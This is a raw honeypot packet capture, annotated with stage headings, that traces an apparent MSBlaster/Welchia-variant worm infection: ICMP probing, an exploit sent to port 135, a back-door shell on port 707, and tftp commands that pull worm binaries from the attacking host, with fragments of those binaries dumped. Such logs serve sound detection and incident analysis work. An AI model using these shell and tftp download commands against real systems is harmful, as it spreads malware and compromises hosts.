MSBLASTER.D Hacking Pattern

The source locates the honeypot by ICMP

08/19-15:03:03.827005 137.189.153.17 -> 192.168.20.2
ICMP TTL:125 TOS:0x0 ID:44941 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:25699 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:03:03.827366 192.168.20.2 -> 137.189.153.17
ICMP TTL:128 TOS:0x0 ID:1155 IpLen:20 DgmLen:92
Type:0 Code:0 ID:512 Seq:25699 ECHO REPLY
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.466648 137.189.153.17 -> 192.168.20.2
ICMP TTL:125 TOS:0x0 ID:40710 IpLen:20 DgmLen:92
Type:8 Code:0 ID:512 Seq:25699 ECHO
................................................................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.467040 192.168.20.2 -> 137.189.153.17
ICMP TTL:128 TOS:0x0 ID:89 IpLen:20 DgmLen:92
Type:0 Code:0 ID:512 Seq:25699 ECHO REPLY
................................................................

Send the exploit data via port 135

08/19-15:17:09.489569 137.189.153.17:4766 -> 192.168.20.2:135
TCP TTL:125 TOS:0x0 ID:40716 IpLen:20 DgmLen:1500 DF
***A**** Seq: 0x672407A8 Ack: 0x7338DF4F Win: 0xFFC3 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.489593 137.189.153.17:4766 -> 192.168.20.2:135
TCP TTL:125 TOS:0x0 ID:40717 IpLen:20 DgmLen:284 DF
***AP*** Seq: 0x67240D5C Ack: 0x7338DF4F Win: 0xFFC3 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.491475 192.168.20.2:135 -> 137.189.153.17:4766
TCP TTL:128 TOS:0x0 ID:92 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x7338DF4F Ack: 0x67240E50 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Set up the remote shell back door at port 707

08/19-15:17:09.525727 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:93 IpLen:20 DgmLen:48 DF
******S* Seq: 0x7339CAE4 Ack: 0x0 Win: 0xFAF0 TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.526684 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40721 IpLen:20 DgmLen:48 DF
***A**S* Seq: 0x6725DC84 Ack: 0x7339CAE5 Win: 0xFFFF TcpLen: 28
TCP Options (4) => MSS: 1460 NOP NOP SackOK
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.527029 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:94 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x7339CAE5 Ack: 0x6725DC85 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.527562 192.168.20.2:135 -> 137.189.153.17:4766
TCP TTL:128 TOS:0x0 ID:95 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x7338DF4F Ack: 0x67240E50 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.528106 137.189.153.17:4766 -> 192.168.20.2:135
TCP TTL:125 TOS:0x0 ID:40722 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x67240E50 Ack: 0x7338DF50 Win: 0xFFC3 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.528288 137.189.153.17:4766 -> 192.168.20.2:135
TCP TTL:125 TOS:0x0 ID:40723 IpLen:20 DgmLen:40 DF
***A***F Seq: 0x67240E50 Ack: 0x7338DF50 Win: 0xFFC3 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.528525 192.168.20.2:135 -> 137.189.153.17:4766
TCP TTL:128 TOS:0x0 ID:96 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x7338DF50 Ack: 0x67240E51 Win: 0xFAF0 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.691181 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:97 IpLen:20 DgmLen:79 DF
***AP*** Seq: 0x7339CAE5 Ack: 0x6725DC85 Win: 0xFAF0 TcpLen: 20
Microsoft Windows XP [Version 5.1.2600]
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.816377 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40768 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x6725DC85 Ack: 0x7339CB0C Win: 0xFFD8 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.816740 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:98 IpLen:20 DgmLen:105 DF
***AP*** Seq: 0x7339CB0C Ack: 0x6725DC85 Win: 0xFAF0 TcpLen: 20
..(C) Copyright 1985-2001 Microsoft Corp.....C:\WINDOWS\system32
>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.817321 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40769 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x6725DC85 Ack: 0x7339CB4D Win: 0xFF97 TcpLen: 20
dir wins\dllhost.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:09.817840 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:99 IpLen:20 DgmLen:61 DF
***AP*** Seq: 0x7339CB4D Ack: 0x6725DC9B Win: 0xFADA TcpLen: 20
dir wins\dllhost.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.016712 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40792 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x6725DC9B Ack: 0x7339CB62 Win: 0xFF82 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.017100 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:100 IpLen:20 DgmLen:192 DF
***AP*** Seq: 0x7339CB62 Ack: 0x6725DC9B Win: 0xFADA TcpLen: 20
 Volume in drive C has no label... Volume Serial Number is D08C-
3DDF.... Directory of C:\WINDOWS\system32\wins....File Not Found
....C:\WINDOWS\system32>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.018383 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40794 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x6725DC9B Ack: 0x7339CBFA Win: 0xFEEA TcpLen: 20
dir dllcache\tftpd.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.018888 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:101 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x7339CBFA Ack: 0x6725DCB3 Win: 0xFAC2 TcpLen: 20
.dir dllcache\tftpd.exe.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.216934 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40809 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x6725DCB3 Ack: 0x7339CC12 Win: 0xFED2 TcpLen: 20
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.217323 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:102 IpLen:20 DgmLen:196 DF
***AP*** Seq: 0x7339CC12 Ack: 0x6725DCB3 Win: 0xFAC2 TcpLen: 20
 Volume in drive C has no label... Volume Serial Number is D08C-
3DDF.... Directory of C:\WINDOWS\system32\dllcache....File Not F
ound....C:\WINDOWS\system32>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

TFTP the worm program SVCHOST.EXE

08/19-15:17:10.218172 137.189.153.17:707 -> 192.168.20.2:1031
TCP TTL:125 TOS:0x0 ID:40811 IpLen:20 DgmLen:97 DF
***AP*** Seq: 0x6725DCB3 Ack: 0x7339CCAE Win: 0xFE36 TcpLen: 20
tftp -i 137.189.153.17 get svchost.exe wins\SVCHOST.EXE..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.218745 192.168.20.2:1031 -> 137.189.153.17:707
TCP TTL:128 TOS:0x0 ID:103 IpLen:20 DgmLen:97 DF
***AP*** Seq: 0x7339CCAE Ack: 0x6725DCEC Win: 0xFA89 TcpLen: 20
.tftp -i 137.189.153.17 get svchost.exe wins\SVCHOST.EXE.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.346771 192.168.20.2:1032 -> 137.189.153.17:69
UDP TTL:128 TOS:0x0 ID:104 IpLen:20 DgmLen:48
Len: 20
..svchost.exe.octet.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.356762 137.189.153.17:4775 -> 192.168.20.2:1032
UDP TTL:125 TOS:0x0 ID:40821 IpLen:20 DgmLen:544
Len: 516
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/19-15:17:10.357366 192.168.20.2:1032 -> 137.189.153.17:4775
UDP TTL:128 TOS:0x0 ID:105 IpLen:20 DgmLen:32
Len: 4
....
................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.424293 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:133 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.427653 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40854 IpLen:20 DgmLen:544 Len: 516 .................... =========================================== ============================= .Abstract: . This implements an RF C 783 tftp daemon. . It listens on port 69 for requests . and spawns a thread to process each request. . .TFTPD USAGE and Installation: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.429188 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:134 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.430934 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40855 IpLen:20 DgmLen:544 Len: 516 .... . . md d:/tftpd (the StartDirectory). . copy // MohsinA_p90/test/tftpd.exe . . sc create tftpd binPath= d:/tftpd/tftpd.exe (give full p ath). . sc query tftpd ( check if installed). . .Start: =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.431397 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:135 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.432355 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40856 IpLen:20 DgmLen:544 Len: 516 ... . sc start tftpd -f (creates a log file). .or sc start tftpd .or net start tftpd .or sc start tftpd [-dStartDirectory] [-e] [-f] . Options: -e use event log. . -f log to fil e. . 
-dS tart =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.433901 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:136 IpLen:20 DgmLen:32 Len: 4 ... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.434830 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40857 IpLen:20 DgmLen:544 Len: 516 ...!Directory .Info: . sc interrogate tftpd (logs will be updated). . sc query tftpd Check whether running. .Stop: . sc stop tftpd . net stop tft pd . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.435285 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:137 IpLen:20 DgmLen:32 Len: 4 ...! =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.436228 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40858 IpLen:20 DgmLen:544 Len: 516 ..." .Variables that control what files can be read/written an d by whom: . StartDirectory - only files there will be accessible. . LogFile is cre ated here. . ValidClients - Clien ts matching this ip address can read files. . eg. you can set it to "157.55.8?.*" . ValidMasters - clients matching this can write and read files. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.437836 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:138 IpLen:20 DgmLen:32 Len: 4 ..." =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.438874 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40859 IpLen:20 DgmLen:544 Len: 516 ...# . eg. you can set it to "" and no one can write. . ValidReadFiles - only matching files will be served out, eg. "r*.t?t". ValidWriteFiles- only matching file s will be accepted, eg. "w*.txt" . .Client: . tftp [-i] servername {get|put} src_file dest_file . -i from binary mode, else ascii mode is used. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.439342 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:139 IpLen:20 DgmLen:32 Len: 4 ...# =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.440262 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40860 IpLen:20 DgmLen:544 Len: 516 ...$ . . ===================================== =================================== ........Tftpd....\..e....... ....................x...d...P...@...$.......*................... ....................................*........................... ............................*................................... ....................*........................................... ................................................................ .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.441798 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:140 IpLen:20 DgmLen:32 Len: 4 ...$ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.443573 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40861 IpLen:20 DgmLen:544 Len: 516 ...%............................................0............... ........H...`p..t...................t.4...V.S._.V.E.R.S.I.O.N._. I.N.F.O...................V.......V.?........................... ......S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.4.0.9.0.4.B.0...L... ..C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t. i.o.n...r.%...F.i.l.e.D.e.s.c.r.i.p.t.i.o.n.....T.C.P./.I.P. .T. r.i.v.i.a.l. .f.i.l.e. .t.r.a.n.s.f.e.r. .d.a.e.m.o.n.......8... ..F.i.l.e.V.e.r.s.i.o.n.....5...0.0...2.1.3.4...1...4.....I.n.t. e.r. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.444052 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:141 IpLen:20 DgmLen:32 Len: 4 ...% =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.448247 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40862 IpLen:20 DgmLen:544 Len: 516 ...&n.a.l.N.a.m.e...t.f.t.p.d...e.x.e...t.(...L.e.g.a.l.C.o.p.y. r.i.g.h.t...C.o.p.y.r.i.g.h.t. .(.C.). .M.i.c.r.o.s.o.f.t. .C.o. r.p... .1.9.8.1.-.1.9.9.9...<.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m. e...t.f.t.p.d...e.x.e...~./...P.r.o.d.u.c.t.N.a.m.e.....M.i.c.r. o.s.o.f.t.(.R.). .W.i.n.d.o.w.s. .(.R.). .2.0.0.0. .O.p.e.r.a.t. i.n.g. .S.y.s.t.e.m.....<.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...5... 0.0...2.1.3.4...1...D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a. n.s.l.a.t.i.o.n................................................. .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.449783 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:142 IpLen:20 DgmLen:32 Len: 4 ...& =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.450551 137.189.153.17:4775 -> 192.168.20.2:1032 UDP TTL:125 TOS:0x0 ID:40863 IpLen:20 DgmLen:304 Len: 276 ...'............exe\tftpd.dbg..exe.............................. ................................................................ ................................................................ ................................................................ .................... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.450939 192.168.20.2:1032 -> 137.189.153.17:4775 UDP TTL:128 TOS:0x0 ID:143 IpLen:20 DgmLen:32 Len: 4 ...' 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.479733 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:144 IpLen:20 DgmLen:102 DF ***AP*** Seq: 0x7339CCE7 Ack: 0x6725DCEC Win: 0xFA89 TcpLen: 20 Transfer successful: 19728 bytes in 1 second, 19728 bytes/s... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

Download another worm program DLLHOST.EXE

08/19-15:17:10.480328 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40864 IpLen:20 DgmLen:97 DF ***AP*** Seq: 0x6725DCEC Ack: 0x7339CD25 Win: 0xFDBF TcpLen: 20 tftp -i 137.189.153.17 get dllhost.exe wins\DLLHOST.EXE.. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.487221 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:145 IpLen:20 DgmLen:42 DF ***AP*** Seq: 0x7339CD25 Ack: 0x6725DD25 Win: 0xFA50 TcpLen: 20 .. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.516860 192.168.20.2:1033 -> 137.189.153.17:69 UDP TTL:128 TOS:0x0 ID:146 IpLen:20 DgmLen:48 Len: 20 ..dllhost.exe.octet. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.609579 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40872 IpLen:20 DgmLen:544 Len: 516 ....MZ......................@................................... ............!..L.!This program cannot be run in DOS mode....$... ....V^%..?KN.?KN.?KNK.XN.?KN.7.N.?KNi#GN.?KN} AN.?KN.#EN.?KN} ON .?KN.?JNv?KN..@N.?KNRich.?KN........PE..L.... .................. .0.......`..`....p........@..................................... ................................................................ ................................................................ .....................................`.......................... .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.610213 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:147 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.612204 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40873 IpLen:20 DgmLen:544 Len: 516 .............0...p..."..................@....................... .&..............@............................................... ................................................................ ................................................................ ................................................................ .........0...UVW.A..3...$5....$....4........@(...........+..D$.. ..................>...P...I:|$.7j..?.}..!0.....ty.L59(SQW.....*. .t[.5 A@J-@..T$0j.R..fn........I.<0PQ.7!....(\.;.....v..R ...p.. &... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.613809 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:148 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.614869 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40874 IpLen:20 DgmLen:544 Len: 516 ....o.....0...UVW.A..3...$5....$....4........@(...........+..D$. ...................>...P...I:|$.7j..?.}..!0.....ty.L59(SQW.....* ..t[.5 A@J-@..T$0j.R..fn........I.<0PQ.7c.....(.RC$.......W...@F _._^].....`.........7.}QSV}<p........~....u.........y.K...C..?.o G..2..u.)-.........,...@.....[....V%.D.H...@......`..3.3..l..... ....................^..[Y......l../u,h.(h.t...,l..,...t....A..n. ....D.......<kX..P.|.h.'..|.s..t.....fw.5.hxt..`.u...9.W...(v6.. 
p.....,^..6......Ph.....;..V`....1....Q.}.....f.|...u$c[..s.>..h l../ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.615430 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:149 IpLen:20 DgmLen:32 Len: 4 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.616403 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40875 IpLen:20 DgmLen:544 Len: 516 ....lj.,.l.f.S...PU.v......X....0d.....5..h...D....{.n...jd..... ...u..,l....|~.Rj.k..'.......@Is..u.~[...P......<`W h...{..=...# h.....F.......=<.no..b.\...x...e..*...V>.l.%f.....%..H...@t..K.d {........1..k#...L......ZJNf.4U|Si...Y...r .,..2.......a.....O.. ....j...}t$ W[3.3.....r.....\X.....'..(..6............ ......... .{.............<.........F.7L.:.........y.=..j..X...O..u....6X[_ tH...PS......A..,...$Pjgk...h@,.....Q.... +...nG..W3....,.q.p.|. .....=./km.z..2..}.....5..#C;.*......x/.h`.?xm.jF.._..A.V.N.A..L a... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.617569 137.189.153.17:707 -> 192.168.20.2:1031 TCP TTL:125 TOS:0x0 ID:40881 IpLen:20 DgmLen:40 DF ***A**** Seq: 0x6725DD25 Ack: 0x7339CD27 Win: 0xFDBD TcpLen: 20 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.617881 192.168.20.2:1031 -> 137.189.153.17:707 TCP TTL:128 TOS:0x0 ID:150 IpLen:20 DgmLen:117 DF ***AP*** Seq: 0x7339CD27 Ack: 0x6725DD25 Win: 0xFA50 TcpLen: 20 C:\WINDOWS\system32>.tftp -i 137.189.153.17 get dllhost.exe wins \DLLHOST.EXE. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.617998 192.168.20.2:1033 -> 137.189.153.17:4778 UDP TTL:128 TOS:0x0 ID:151 IpLen:20 DgmLen:32 Len: 4 .... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 08/19-15:17:10.619736 137.189.153.17:4778 -> 192.168.20.2:1033 UDP TTL:125 TOS:0x0 ID:40882 IpLen:20 DgmLen:544 Len: 516 .....9;`.8QT...t5..R..0a...t.$.a.....R.@^].....b-.$M.....r{.v..z ....0z|p.lC.dxv..fG.P{.\.|.........P./.........2.T....d......8.. Q5`}.QP.<D.i...@.HDXO.m.TPLf.lpnw68..h..U...__v#..T.$t4......a.. .ZK)........b0...K.......<...........w...u.f.....V...L...4...w.. ...6..Y!6f...T"...l@.B."...d.1.xq..<....2......V..........f.m... ...........f.......o...f.....u...-..(a&..V....-7..D.z.v..4.r.... ...g+..Q`W<.u.R1(0........_0.~..m.#...t&.....Mz..PQ... X.f.T..;. j:.v.)...%.......... N_tJ.....(."d.v}4.P;.Y..tL.vf]...c.....<.dv a60- 